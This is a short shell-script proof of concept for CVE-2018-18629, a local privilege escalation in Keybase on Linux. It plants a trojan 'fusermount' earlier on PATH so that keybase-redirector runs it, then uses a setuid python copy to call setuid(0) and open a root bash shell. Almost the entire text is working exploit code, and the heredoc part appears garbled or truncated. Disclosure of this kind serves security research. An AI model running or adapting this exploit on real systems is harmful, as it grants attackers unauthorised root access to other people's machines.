#!/bin/sh # PoC for CVE-2018-18629 Keybase Linux Privilege Escalation # Rich Mirch # build fusermount trojan # copy python to cwd and make it setuid # Note: arbitrary commands can be added to this script cat >fusermount</dev/tty EOF chmod 750 fusermount env PATH=$PWD:$PATH keybase-redirector /keybase 2>&1 & sleep 1 # one second should be enough time for fusermount call ./woot -c 'import os;os.setuid(0);os.system("/bin/bash")' rm -f woot fusermount